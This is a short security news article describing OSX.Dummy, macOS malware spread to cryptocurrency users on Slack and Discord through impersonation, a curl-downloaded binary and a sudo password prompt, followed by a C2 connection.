New macOS Cyberattack Focuses on Cryptocurrency Investors

Digital criminals who are using a piece of macOS-based malware called OSX.Dummy seem to be targeting a group of cryptocurrency investors who use Discord as well as those who use Slack. OSX.Dummy isn’t a particularly sophisticated piece of software, but it does seem to allow arbitrary code execution on machines that it can get embedded into.

Unix security experts first found evidence of the malware a few days ago. Top researcher Remco Verhoef reported his findings on the SANS’ InfoSec blog back on Friday, and his post indicated that there were a series of attacks on macOS during the last week.

Chat groups on Slack and Discord have reported people who impersonate system administrators and popular instant messaging personalities. The individuals they’re impersonating are known for giving out useful cryptocurrency-based apps, which makes it easier for them to trick legitimate users into installing harmful code.

Regular users are then enticed by crackers to run a very small script that downloads a much larger 34 megabyte file. This file, which gets downloaded via the curl CLI app, contains the OSX.Dummy software. Since Unix permissions can thwart crackers to some degree, they’ve made sure to save the new download to a temporary directory.

Since it appears to be a regular mach064 binary, it can then execute normally to some degree on a macOS system. Online social malware scanning sites don’t seem to plug it as a threat just yet, which may be inadvertently helping crackers trick normal users into thinking that it’s safe.

Normally an unsigned binary file like the one that contains OSX.Dummy wouldn’t be able to run. However, macOS Gatekeepr security subroutines don’t check files that are being downloaded and then run exclusively via a terminal. Since the attack vector involves manual use of the Unix command prompt, a victim’s Macintosh is none the wiser.

A call to sudo then prompts the user to enter their administration password, much as it would on GNU/Linux systems. As a result, the binary can then gain full access to a user’s underlying file system.

The malware then connects to a C2 server, thus potentially giving a cracker control of the host machine. OSX.Dummy also saves the victim’s password, once more in a temporary directory for future use.

Kamil Anwar
Kamil is a certified MCITP, CCNA (W), CCNA (S) and a former British Computer Society Member with over 9 years of experience Configuring, Deploying and Managing Switches, Firewalls and Domain Controllers also an old-school still active on FreeNode.